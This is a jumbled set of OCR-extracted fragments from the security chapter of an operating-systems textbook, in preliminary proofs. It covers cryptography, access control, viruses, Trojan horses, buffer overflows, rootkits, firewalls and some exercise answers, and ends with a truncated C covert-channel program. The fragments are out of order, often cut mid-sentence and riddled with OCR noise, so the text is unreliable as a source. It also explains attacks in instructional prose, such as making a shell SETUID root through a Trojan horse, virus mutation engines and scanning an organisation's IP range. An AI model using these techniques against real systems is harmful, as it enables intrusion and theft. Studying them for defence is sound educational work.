70. PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage in a retrieval system or transmission in any form or by any means electronic mechanical photocopying recording or likewise SECURITY Many companies possess valuable information that they guard closely This information can be technical e g a new chip design or software commercial e g studies of the competition or marketing plans financial e g plans for a stock offering legal e g documents about a potential merger or takeover among many other possibilities Frequently this information is protected by hav ing a uniformed guard at the building entrance who checks to see that all people entering the building are wearing a proper badge In addition many offices may be locked and some file cabinets may be locked as well to ensure that only author ized people have access to the information Home computers increasingly have valuable data on them too Many people keep their financial information including tax returns and credit card numbers on their computer Love letters have gone digital And hard disks these days are full of important photos videos and movies As more and more of this in
71. Pakistan 7 years ago What is the user supposed to do with the message WARNING File xyz exe may contain the lahore 9x virus Delete The more viruses in the database and the broader the criteria for declaring a hit the more false alarms there will be If there are too many the user will give up in disgust But if the virus scanner insists on a very close match it may miss some modified viruses Getting it right is a delicate heuristic balance Ideally the lab should try to identify some core code in the virus that is not likely to change and use this as the virus signature to scan for Just because the disk was declared virus free last week does not mean that it still is so the virus scanner has to be run frequently Because scanning is slow it is more efficient to check only those files that have been changed since the date of the last scan The trouble is a clever virus will reset the date of an infected file to its original date to avoid detection The antivirus program s response to that is to check the date the enclosing directory was last changed The virus response to that is to reset the directory s date as well This is the start of the cat and mouse game alluded to above Another way for the antivirus program to detect file infection is to record and store on the disk the lengths of all files If a file has grown since the last check it might be infected as shown in Fig 9 32 a b However a clever virus can avoid detecti
72. a calculator computer or other external help Although squaring and square rooting are inverse operations they differ enor mously in their computational complexity This kind of asymmetry forms the basis of public key cryptography Encryption makes use of the easy operation but decryption without the key requires you to perform the hard operation A public key system called RSA exploits the fact that multiplying really big numbers is much easier for a computer to do than factoring really big numbers especially when all arithmetic is done using modulo arithmetic and all the numbers involved have hundreds of digits Rivest et al 1978 This system is widely used in the cryptographic world Systems based on discrete logarithms are also used El Gamal 1985 The main problem with public key cryptography is that it is a thousand times slower than symmetric cryptography The way public key cryptography works is that everyone picks a public key private key pair and publishes the public key The public key is the encryption key the private key is the decryption key Usually the key generation is automated possibly with a user selected password fed into the algorithm as a seed To send a secret message to a user a correspondent encrypts the message with the receiver s public key Since only the receiver has the private key only the receiver can decrypt the message 9 2 3 One Way Functions There are various situations that we will see later in
73. al collects enough data about a person such as date of birth mother s maiden name social security num ber bank account numbers passwords and so on to be able to successfully impersonate the victim and get new physical documents such as a replacement driver s license bank debit card birth certificate and more These in turn can be sold to other criminals for further exploitation Another form of crime that some malware commits is to lie low until the user correctly logs into his Internet banking account Then it quickly runs a transaction to see how much money is in the account and immediately transfers all of it to the criminal s account from which it is immediately transferred to another account and then another and another all in different corrupt countries so the police need days or weeks to collect all the search warrants they need to follow the money and which may not be honored even if they do get them These kinds of crime are big business it is not pesky teenagers any more In addition to its use by organized crime malware also has industrial applica tions A company could release a piece of malware that checked if it was running at a competitor s factory and with no system administrator currently logged in If the coast was clear it would interfere with the production process reducing pro duct quality thus causing trouble for the competitor In all other cases it would do nothing making it hard to detect Another
74. al reaction was that it had every right to protect its intellectual property In an interview on National Public Radio Tho mas Hesse the president of Sony BMG s global digital business said Most peo ple I think don t even know what a rootkit is so why should they care about it When this response itself provoked a firestorm Sony released a patch that removed the cloaking of sys files but kept the rootkit in place Under increasing pressure Sony eventually released an uninstaller on its Website but to get it users had to sign up provide an e mail address and agree that Sony could send them promotional material in the future what most people call spam As the story continued to play out it emerged that Sony s uninstaller con tained technical flaws that made the infected computer highly vulnerable to attacks over the Internet It was also revealed that the rootkit contained code from open source projects in violation of their copyrights which permitted free use of the software provided that the source code is released In addition to an unparalleled public relations disaster Sony also faced legal jeopardy The state of Texas sued Sony for violating its antispyware law as well as for violating its deceptive trade practices law because the rootkit was installed even if the license was declined Class action suits were later filed in 39 states In December 2006 these suits were settled when Sony agreed to pay 4 25 mil
75. all do nothing Thus the program of Fig 9 33 c is functionally the same as the one of Fig 9 33 a When copying itself the virus could use Fig 9 33 c instead of Fig 9 33 a and still work later when executed A virus that mutates on each copy is called a polymorphic virus Now suppose that R5 is not needed for anything during this piece of the code Then Fig 9 33 d is also equivalent to Fig 9 33 a Finally in many cases it is possible to swap instructions without changing what the program does so we end up with Fig 9 33 e as another code fragment that is logically equivalent to Fig 9 33 a A piece of code that can mutate a sequence of machine instructions without changing its functionality is called a mutation engine and sophisticated viruses contain them to mutate the decryptor from copy to copy Mutations can consist of inserting useless but harmless code permuting instructions swapping registers and replacing an instruction with an equivalent one The mutation engine itself can be hidden by encrypting it along with the body of the virus Asking the poor antivirus software to understand that Fig 9 33 a through Fig 9 33 e are all functionally equivalent is asking a lot especially if the muta tion engine has many tricks up its sleeve The antivirus software can analyze the code to see what it does and it can even try to simulate the operation of the code PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education In
76. an be just as devastating Another category of virus writers is the military which sees viruses as a weapon of war potentially able to disable an enemy s computers Another issue related to spreading viruses is avoiding detection Jails have notoriously bad computing facilities so Virgil would prefer avoiding them If he posts the initial virus from his home machine he is running a certain risk If the attack is successful the police might track him down by looking for the virus message with the youngest timestamp since that is probably closest to the source of the attack To minimize his exposure Virgil might go to an Internet cafe in a distant city and log in there He can either bring the virus on a USB stick or CD ROM and read it in himself or if the machines do not have USB ports or CD ROM drives ask the nice young lady at the desk to please read in the file book doc so he can print it Once it is on his hard disk he renames the file virus exe and executes it infecting the entire LAN with a virus that triggers a month later just in case the police decide to ask the airlines for a list of all people who flew in that week An alternative is to forget the USB stick and CD ROM and fetch the virus from a remote FTP site Or bring a notebook and plug it in to an Ethernet port that the Internet cafe has thoughtfully provided for notebook toting tourists who want to read their e mail every day Once connected to the LAN Virgil can set out to in
77. an then create a process to run the program or script This process can then listen to a specific IP port waiting for commands from afar which it car ries out turning the machine into a zombie To prevent the new zombie from being lost when the machine is rebooted the attacking code just has to arrange that the newly fetched program or shell script is started whenever the machine is booted This is easy to do in both Windows and all UNIX systems A substantial fraction of all security problems are due to this flaw which is difficult to fix because there are so many existing C programs around that do not check for buffer overflow Detecting that a program has buffer overflow problems is easy just feed it 10 000 character file names 100 digit salaries or something equally unexpected to see if it dumps core The next step is to analyze the core dump to see where the long stream is stored From there figuring out which character overwrites the return address is not so difficult If the source code is available as it is for most UNIX programs the attack is even easier because the layout of the stack is known in advance The attack can be defended against by fixing the code to explicitly check the length of all user supplied strings before stuffing them into fixed length buffers Unfortunately the fact that some program is vulnerable to this kind of attack generally shows up after a successful attack 9 6 2 Format String Attacks Some programmer
78. and decrypted itself before each use it would be quite hard to detect This type has not been observed in the wild yet 2 Hypervisor rootkits An extremely sneaky kind of rootkit could run the entire operating system and all the applications in a virtual ma PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBAn any form or by any means electronic ii mechanical photocopying recording or likewise chine under its control The first proof of concept blue pill a refer ence to a movie called The Matrix was demonstrated by a Polish hacker named Joanna Rutkowska in 2006 This kind of rootkit usu ally modifies the boot sequence so that when the machine is powered on it executes the hypervisor on the bare hardware which then starts the operating system and its applications in a virtual machine The strength of this method like the previous one is that nothing is hid den in the operating system libraries or programs so rootkit detec tors that look there will come up short 3 Kernel rootkits The most common kind of rootkit at present is one that infects the operating system and hides in it as a device driv
79. anical photocopying recording or likewise editor all it can do is read those two files On the other hand if the editor can access all of the user s objects then Trojan horses can do their dirty work capabilities or not 35 From a security point of view it would be ideal Used blocks sometimes are exposed leaking valuable information From a performance point of view zeroing blocks wastes CPU time thus degrading performance 36 For any operating system all programs must either start execution at a known address or have a starting address stored in a known position in the program file header a The virus first copies the instructions at the normal start address or the address in the header to a safe place and then inserts a jump to itself into the code or its own start address into the header b When done with its own work the virus executes the instructions it borrowed followed by a jump to the next instruction that would have been executed or transfers control to the address it found in the original header 37 A master boot record requires only one sector and if the rest of the first track is free it provides space where a virus can hide the original boot sector as well as a substantial part of its own code Modern disk controllers read and buffer entire tracks at a time so there will be no perceivable delay or sounds of additional seeks as the extra data is read 38 C programs have extension c Instead of using the acc
80. any prohibited reproduction 22 storage in a retrieval system or HASMIRSIBY in any form or by any means elecf amp rdiAP 9 mechanical photocopying recording or likewise to specification the system security cannot be compromised no matter what else is wrong The TCB typically consists of most of the hardware except I O devices that do not affect security a portion of the operating system kernel and most or all of the user programs that have superuser power e g SETUID root programs in UNIX Operating system functions that must be part of the TCB include process creation process switching memory map management and part of file and I O management In a secure design often the TCB will be quite separate from the rest of the operating system in order to minimize its size and verify its correctness An important part of the TCB is the reference monitor as shown in Fig 9 11 The reference monitor accepts all system calls involving security such as opening files and decides whether they should be processed or not The reference monitor thus allows all the security decisions to be put in one place with no possibility of bypassing it Most operating systems are not designed this way which is part of the reason they are so insecure User process User space All system calls go through the reference monitor for security checking Reference monitor Kernel Trusted computing base space Operating system kernel Figure
81. ardware firewalls but in software They are filters that attach to the network code inside the operating system kernel and filter packets the same way the hardware firewall does 9 8 2 Antivirus and Anti Antivirus Techniques Firewalls try to keep intruders out of the computer but they can fail in various ways as described above In that case the next line of defense are the antimalware programs often called antivirus programs although many of them also combat worms and spyware as well Viruses try to hide and users try to find them which leads to a cat and mouse game In this respect viruses are like root kits except that most virus writers emphasize rapid spread of the virus rather than playing hide and seek as rootkits do Let us now look at some of the techniques used by antivirus software and also how Virgil the virus writer responds to them PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 86 storage in a retrieval system or HASMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise Virus Scanners Clearly the average garden variety user is not going to find many viruses that do their best to hide so
82. arrows go sideways or up The x property says that all dashed write arrows also go sideways or up Since information flows only horizontally or upward any information that starts out at level k can never appear at a lower level In other words there is never a path that moves information downward thus guaranteeing the security of the model The Bell La Padula model refers to organizational structure but ultimately has to enforced by the operating system One way this could be done is by assign ing each user a security level to be stored along with other user specific data such as the UID and GID Upon login the user s shell would acquire the user s secu rity level and this would be inherited by all its children If a process running at security level k attempted to open a file or other object whose security level is greater than k the operating system should reject the open attempt Similarly attempts to open any object of security level less than k for writing must fail The Biba Model To summarize the Bell La Padula model in military terms a lieutenant can ask a private to reveal all he knows and then copy this information into a general s file without violating security Now let us put the same model in civilian terms Imagine a company in which janitors have security level 1 programmers have security level 3 and the president of the company has security level 5 Using Bell La Padula a programmer can query a janitor about the c
83. astle This design forced everyone entering or leaving the castle to pass over a single drawbridge where they could be inspected by the I O police With networks the same trick is possible a company can have many LANs connected in arbitrary ways but all traffic to or from the company is forced through an electronic drawbridge the firewall Firewalls come in two basic varieties hardware and software Companies PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 84 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddidP 9 mechanical photocopying recording or likewise with LANs to protect usually opt for hardware firewalls individuals at home fre quently choose software firewalls Let us look at hardware firewalls first A gen eric hardware firewall is illustrated in Fig 9 31 Here the connection cable or optical fiber from the network provider is plugged into the firewall which is con nected to the LAN No packets can enter or exit the LAN without being approved by the firewall In practice firewalls are often combined with routers network address translation boxes intrusion detection systems and other things but our focus
84. at ing system will carry out his request because it does not know that the state of Fig 9 12 b is unauthorized It should now be clear that the set of all possible matrices can be partitioned into two disjoint sets the set of all authorized states and the set of all unauthorized states A question around which much theoretical research has revolved is this Given an initial authorized state and a set of commands can it be proven that the system can never reach an unauthorized state In effect we are asking if the available mechanism the protection commands is adequate to enforce some protection policy Given this policy some initial state of the matrix and the set of commands for modifying the matrix what we would like is a way to prove that the system is secure Such a proof turns out quite diffi cult to acquire many general purpose systems are not theoretically secure Harrison et al 1976 proved that in the case of an arbitrary configuration for an arbitrary protection system security is theoretically undecidable However for a specific system it may be possible to prove whether the system can ever move from an authorized state to an unauthorized state For more information see Landwehr 1981 9 3 7 Multilevel Security Most operating systems allow individual users to determine who may read and write their files and other objects This policy is called discretionary access control In many environments this model works fi
85. ation 15 In the Amoeba scheme for protecting capabilities a user can ask the server to produce a new capability with fewer rights which can then be given to a friend What happens if the friend asks the server to remove even more rights so the friend can give it to yet someone else PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This Publication fa protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage in a retrieval system or iby in any form or by any means electrernioy 9 mechanical photocopying recording or likewise 16 In Fig 9 13 there is no arrow from process B to object 7 Would such an arrow be allowed If not what rule would it violate 17 In Fig 9 13 there is no arrow from object 2 to process A Would such an arrow be allowed If not what rule would it violate 18 If process to process messages were allowed in Fig 9 13 what rules would apply to them For process B in particular to which processes could it send messages and which not 19 Consider the steganographic system of Fig 9 16 Each pixel can be represented in a color space by a point in the 3 dimensional system with axes for the R G and B values Using this space explain what happens to the color resolution when steganog raphy is
86. ation has changed although not entirely since shared servers on corporate LANs are just like shared minicomput ers At least for home users the threat of another user snooping on his or her files became nonexistent because there were no other users on that computer Unfortunately as this threat diminished another one rose up to take its place the law of conservation of threats attacks from the outside Viruses worms and other digital pests began to crop up enter computers over the Internet and wreak all manner of havoc once established Aiding them in their quest to do damage has been the explosive growth of bloated bugware which has replaced the lean and mean software of previous years With operating systems containing 5 million lines of code in the kernel and 100 MB applications being the rule rather than the exception there are vast numbers of bugs that the digital pests can exploit to do things that are not allowed by the rules Thus we now have a situation in which one can formally show that a system is safe yet it can be easily comprom ised because some bug in the code allows a rogue program to do things it is for mally forbidden from doing To cover all the bases this chapter has two parts It starts out looking at threats in some detail to see what we want to protect Then we have Sec 9 2 introducing modern cryptography which is a basic tool important in the security PRELIMINARY PROOFS Unpublished Work 2008 by Pearso
87. be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBAn any form or by any means electronic 73 mechanical photocopying recording or likewise machine it could gain access to He worked on the program for months carefully tuning it and having it try to hide its tracks It is not known whether the release on Nov 2 1988 was intended as a test or was the real thing In any event it did bring most of the Sun and VAX systems on the Internet to their knees within a few hours of its release Morris motivation is unknown but it is possible that he intended the whole idea as a high tech practical joke but which due to a programming error got completely out of hand Technically the worm consisted of two programs the bootstrap and the worm proper The bootstrap was 99 lines of C called c It was compiled and executed on the system under attack Once running it connected to the machine from which it came uploaded the main worm and executed it After going to some trouble to hide its existence the worm then looked through its new host s routing tables to see what machines that host was connected to and attempted to spread the bootstrap to those machines Three methods were tried to infect new machines Method 1 was to try to run a remote shell using the rsh command Some machines trust other machines and just run rsh without any further authentication If this worked the
88. c To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHINSSEDSin any form or by any means electronic 9 mechanical photocopying recording or likewise but remember it may have thousands of viruses and thousands of files to analyze so it does not have much time per test or it will run horribly slowly As an aside the store into the variable Y was thrown in just to make it harder to detect the fact that the code related to R5 is dead code that is does not do any thing If other code fragments read and write Y the code will look perfectly legi timate A well written mutation engine that generates good polymorphic code can give antivirus software writers nightmares The only bright side is that such an engine is hard to write so Virgil s friends all use his code which means there are not so many different ones in circulation yet So far we have talked about just trying to recognize viruses in infected exe cutable files In addition the antivirus scanner has to check the MBR boot sec tors bad sector list flash memory CMOS memory etc but what if there is a memory resident virus currently running That will not be detected Worse yet suppose the running virus is monitoring all sy
89. can play a role A Model based IDS is not the only kind by any means Many IDSes make use of a concept called a honeypot a trap set to attract and catch crackers and malware Usuually it is an isolated machine with few defenses and a seemingly interesting and valuable content ripe for the picking The people who set the honeypot carefully monitor any attacks on it to try to learn more about the nature of the attack Some IDSes put their honeypots in virtual machines to prevent dam age to the underlying actual system So naturally the malware tries to determine if it is running in a virtual machine as discussed above 9 8 6 Encapsulating Mobile Code Viruses and worms are programs that get onto a computer without the owner s knowledge and against the owner s will Sometimes however people more or less intentionally import and run foreign code on their machines It usually PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 96 storage in a retrieval system or HAsMREibY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise happens like this In the distant past which in the Internet world means a few years ago
90. cation is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 14 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise kernel part The kernel part has access to a different set of objects from the user part For example the kernel can access all the pages in physical memory the entire disk and all the other protected resources Thus a system call causes a domain switch When a process does an exec on a file with the SETUID or SETGID bit on it acquires a new effective UID or GID With a different UID GID combination it has a different set of files and operations available Running a program with SETUID or SETGID is also a domain switch since the rights available change An important question is how the system keeps track of which object belongs to which domain Conceptually at least one can envision a large matrix with the rows being domains and the columns being objects Each box lists the rights if any that the domain contains for the object The matrix for Fig 9 4 is shown in Fig 9 5 Given this matrix and the current domain number the system can tell if an access to a given object in a particular way from a specified domain is allowed Object File1 File2 File3 File4 File5 File6 Printer Plotter2 Domain Read Read 2 Read Write wae Write Execute Read 3 Write Write Write
91. ce Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 62 storage in a retrieval system or 4HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise containing a Trojan horse so it will be invoked all the time now Our malicious but legal user Mal could also lay a trap for the superuser as follows He puts a version of s containing a Trojan horse in his own directory and then does something suspicious that is sure to attract the superuser s attention such as starting up 100 compute bound processes at once Chances are the superuser will check that out by typing cd home mal Is to see what Mal has in his home directory Since some shells try the local direc tory before working through PATH the superuser may have just invoked Mal s Trojan horse with superuser power The Trojan horse could make home nal bin sh SETUID root All it takes is two system calls chown to change the owner of home mal bin sh to root and chmod to set its SETUID bit Now Mal can become superuser at will by just running that shell If Mal finds himself frequently short of cash he might use one of the follow ing Trojan horse scams to help his liquidity position In the first one the Trojan horse checks to see if the victim has an onli
92. cker has discovered a bug in apache that can be exploited he might be able to send a very long URL to 207 68 160 190 on port 80 and force a buffer overflow thus taking over one of the machines inside the firewall which could then be used to launch an attack on other machines on the LAN Another potential attack is to write and publish a multiplayer game and get it widely accepted The game software needs some port to connect to other players so the game designer may select one say 9876 and tell the players to change their firewall settings to allow incoming and outgoing traffic on this port People who have opened this port are now subject to attacks on it which may be easy especially if the game contains a Trojan horse that accepts certain commands from afar and just runs them But even if the game is legitimate it might contain exploitable bugs The more ports are open the greater the chance of an attack succeeding In addition to stateless firewalls there are also stateful firewalls which keep track of connections and what state they are in These firewalls are better at defeating certain kinds of attacks especially those relating to establishing connec tions Yet other kinds of firewalls implement an IDS Intrusion Detection Sys tem in which the firewall inspects not only the packet headers but also the packet contents looking for suspicious material Software firewalls sometimes called personal firewalls do the same thing as h
93. ctive intruders are more malicious they want to make unauthorized changes to data When designing a system to be secure against intruders it is important to keep in mind the kind of intruder one is trying to protect against Some common categories are 1 Casual prying by nontechnical users Many people have personal computers on their desks that are connected to a shared file server and human nature being what it is some of them will read other people s electronic mail and other files if no barriers are placed in the way Most UNIX systems for example have the default that all newly created files are publicly readable 2 Snooping by insiders Students system programmers operators and other technical personnel often consider it to be a personal challenge to break the security of the local computer system They often are highly skilled and are willing to devote a substantial amount of time to the effort 3 Determined attempts to make money Some bank programmers have attempted to steal from the bank they were working for Schemes have varied from changing the software to truncate rather than round interest keeping the fraction of a cent for themselves to siphoning off accounts not used in years to blackmail Pay me or I will des troy all the bank s records 4 Commercial or military espionage Espionage refers to a serious and well funded attempt by a competitor or a foreign country to steal programs trade secrets pa
94. d sent to the central computer Often the information contains the user s password e g PIN code so the terminal can do an identity check even if the link to the main computer is down Typically the password is en crypted by a key known only to the bank These cards cost about 0 10 to 0 50 depending on whether there is a hologram sticker on the front and the production volume As a way to identify users in general magnetic stripe cards are risky because the equipment to read and write them is cheap and widespread Chip cards contain a tiny integrated circuit chip on them These cards can be further subdivided into two categories stored value cards and smart cards Stored value cards contain a small amount of memory usually less than 1 KB using ROM technology to allow the value to be remembered when the card is removed from the reader and thus the power turned off There is no CPU on the card so the value stored must be changed by an external CPU in the reader These cards are mass produced by the millions for well under 1 and are used for example as prepaid telephone cards When a call is made the telephone just decrements the value in the card but no money actually changes hands For this reason these cards are generally issued by one company for use on only its machines e g telephones or vending machines They could be used for login authentication by storing a 1 KB password in them that the reader would send to the central co
95. de a virtual machine is safe though The industry should also take the virus threat seriously and change some dangerous practices First make simple operating systems The more bells and whistles there are the more security holes there are That is a fact of life Second forget active content From a security point of view it is a disaster Viewing a document someone sends you should not require your running their program JPEG files for example do not contain programs and thus cannot con tain viruses All documents should work like that Third there should be a way to selectively write protect specified disk cylinders to prevent viruses from infecting the programs on them This protection could be implemented by having a bitmap inside the controller listing the write protected cylinders The map should only be alterable when the user has flipped a mechanical toggle switch on the computer s front panel Fourth flash memory is a nice idea but it should only be modifiable when an external toggle switch has been flipped something that will only happen when the user is consciously installing a BIOS update Of course none of this will be taken seriously until a really big virus hits For example one that hits the financial world and resets all bank accounts to 0 Of course by then it will be too late PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc
96. dea here is that you should have multiple layers of security so that if one of them is breached there are still others to overcome Think about a house with a high spiky locked iron fence around it motion detectors in the yard two industrial strength locks on the front door and a computerized burglar alarm system inside While each tech nique is valuable by itself to rob the house the burglar would have to defeat all of them Properly secured computer systems are like this house with multiple layers of security We will now look at some of the layers The defenses are not really hierarchical but we will start roughly with the more general outer ones and work our way to more specific ones 9 8 1 Firewalls The ability to connect any computer anywhere to any other computer any where is a mixed blessing While there is a lot of valuable material on the Web being connected to the Internet exposes a computer to two kinds of dangers in coming and outgoing Incoming dangers include crackers trying to enter the com puter as well as viruses spyware and other malware Outgoing dangers include confidential information such as credit card numbers passwords tax returns and all kinds of corporate information getting out Consequently mechanisms are needed to keep good bits in and bad bits out One approach to use a firewall which is just a modern adaptation of that old medieval security standby digging a deep moat around your c
97. der does not load the cavity areas into memory the virus will need another way of getting started Memory Resident Viruses So far we have assumed that when an infected program is executed the virus runs passes control to the real program and then exits In contrast a memory resident virus stays in memory all the time either hiding at the very top of memory or perhaps down in the grass among the interrupt vectors the last few hundred bytes of which are generally unused A very smart virus can even modify the operating system s RAM bitmap to make the system think the virus memory is occupied to avoid the embarrassment of being overwritten A typical memory resident virus captures one of the trap or interrupt vectors by copying the contents to a scratch variable and putting its own address there thus directing that trap or interrupt to it The best choice is the system call trap In that way the virus gets to run in kernel mode on every system call When it is done it just invokes the real system call by jumping to the saved trap address Why would a virus want to run on every system call To infect programs naturally The virus can just wait until an exec system call comes along and then knowing that the file at hand is an executable binary and probably a useful one at that infect it This process does not require the massive disk activity of Fig 9 27 so it is far less conspicuous Catching all system calls also gives the virus
98. different login names and or passwords to keep them separate The point of this scheme is to prevent Tana from accessing the password file when she currently has her pigeon fancier s hat on She can only do that when logged in as the system administrator In some cases a user may have access to certain files independent of which PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This aad ts is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Gdns Gd tensnhdsiqokh aNy SdvikdSor by any means electronic 17 mechanical photocopying recording or likewise group she is currently logged in as That case can be handled by introducing the concept of a wildcard which mean everyone For example the entry tana RW for the password file would give Tana access no matter which group she was currently in as Yet another possibility is that if a user belongs to any of the groups that have certain access rights the access is permitted In this case a user belonging to multiple groups does not have to specify which group to use at login time All of them count all of the time A disadvantage of this approach is that it provides less encapsulation Tana can edit the password file during a pigeon club meeting
99. dth will allow From their point of view having to spray them over many machines being attacked simultaneously is not a serious disadvantage Instead of pinging machines in IP address order a cracker may wish to target a specific company university or governmental organization say the University of Foobar at foobar edu To find out what IP addresses they use all he has to do is type dnsquery foobar edu and he will get a list of some of their IP addresses Alternatively the programs nslookup or dig can also be used Yet another possibility is to type DNS query to any search engine to find a Website that does DNS lookups for example www dnsstuff com Since many organizations have 65 536 consecutive IP addresses a common allocation unit in the past once he knows the first 2 bytes of their IP addresses which dnsquery supplies it is straightforward to ping all 65 536 of them to see which ones respond and which ones accept telnet connec tions From there on it is back to guessing login names and passwords a subject we have already discussed Needless to say the entire process of starting with a domain name finding the first 2 bytes of its IP addresses pinging all of them to see which ones are alive checking to see if any accept telnet connections and then trying statistically likely PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc U
100. e consider n 4 although in practice a much larger value of n would be used If the secret password is s the first password is given by running the one way function n times Pi fFFCE The second password is given by running the one way function n 1 times Pr fFEF s The third password runs f twice and the fourth password runs it once In general Pi f P The key fact to note here is that given any password in the sequence it is easy to compute the previous one in the numerical sequence but impossible to compute the next one For example given P it is easy to find P but impossible to find P3 The server is initialized with Po which is just f P This value is stored in the password file entry associated with the user s login name along with the integer 1 indicating that the next password required is P When the user wants PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 40 storage in a retrieval system or 4HASMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise to log in for the first time he sends his login name to the server which responds by sending the integer in the passw
101. e Windows admin tools Website www sysinternals com who was then working on developing a rootkit detector and was most surprised to find a rootkit on his own system He wrote about it on his blog and soon the story was all over the Internet and the mass media Scientific papers were written about it Arnab and Hutchison 2006 Bishop and Frincke 2006 Felten and Halderman 2006 Halderman and Felten 2006 and Levine et al 2006 It took years for the resulting furore to die down Below we will give a quick description of what happened When a user inserts a CD in the drive on a Windows computer Windows looks for a file called autorun inf which contains a list of actions to take usually starting some program on the CD such as an installation wizard Normally audio CDs do have these files since stand alone CD players ignore them if PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 82 storage in a retrieval system or 4HAsMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise present Apparently some genius at Sony thought that he would cleverly stop mu sic piracy by putting an autorun inf file on some of its CDs
102. e add on People who install the toolbar then get the spyware The popular Alexa toolbar contains spyware for example In essence this scheme is a Trojan horse just packaged differently The third infection variant is more devious Many Web pages use a Microsoft technology called activeX controls These controls are Pentium binary programs that plug into Internet Explorer and extend its functionality for example render ing special kinds of image audio or video Web pages In principle this technol ogy is perfectly legitimate In practice it is extremely dangerous and is probably the main method by which spyware infections happen This approach always tar gets IE Internet Explorer never Firefox or other browsers When a page with an activeX control is visited what happens depends on the IE security settings If they are set too low the spyware is automatically down loaded and installed The reason people set the security settings low is that when they are set high many Websites do not display correctly or at all or IE is con stantly asking permission for this and that none of which the user understands Now suppose the user has the security settings fairly high When an infected Web page is visited IE detects the activeX control and pops up a dialog box that contains a message provided by the Web page It might say Do you want to install and run a program that will speed up your Internet access Most people will think this is a
103. e authenticated at log in time After all if the operating system cannot be sure who the user is it cannot which files and other resources he can access While authentication may sound like a trivial topic it is a bit more complicated than you might expect Read on User authentication is one of those things we meant by ontogeny recapitu lates phylogeny in Sec 1 5 7 Early mainframes such as the ENIAC did not have an operating system let alone a login procedure Later mainframe batch and timesharing systems generally did have a login procedure for authenticating jobs and users Early minicomputers e g PDP 1 and PDP 8 did not have a login procedure but with the spread of UNIX on the PDP 11 minicomputer logging in was again needed Early personal computers e g Apple II and the original IBM PC did not have a login procedure but more sophisticated personal computer operating sys tems such as Linux and Windows Vista do although foolish users can disable it Machines on corporate LANs almost always have a login procedure configured so that users cannot bypass it Finally many people nowadays indirectly log into remote computers to do Internet banking e shopping download music and other PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and wr
104. e first interval and not readable during the second and third intervals A collaborator can determine the readability of a file for its owner even though the collaborator himself has no access as long as the file is in a directory that can be read The sleep system call is used to control the timing This makes the whole process pretty slow since you can t sleep less than 1 second define MAX 80 include lt stdio h gt include lt fcntl h gt int main void i int C int i 0 int n 0 int fd char s MAX get the input string save only 0 s and 1 s count chars while c getchar EOF amp amp n lt MAX if c 0 c 1 s n c s n 7 create the signal file fd creat tmp tmp000 0600 for each 0 or 1 execute the corresponding sequence while i n c s i chmod tmp tmp000 0 switch c case 0 PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication i protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage ina LEANE QEEGRLANS R Ray y means elecireni P 9 mechanical photocopying recording or likewise sleep 2 chmod tmp tmp000 0400 sleep 1 break case 1
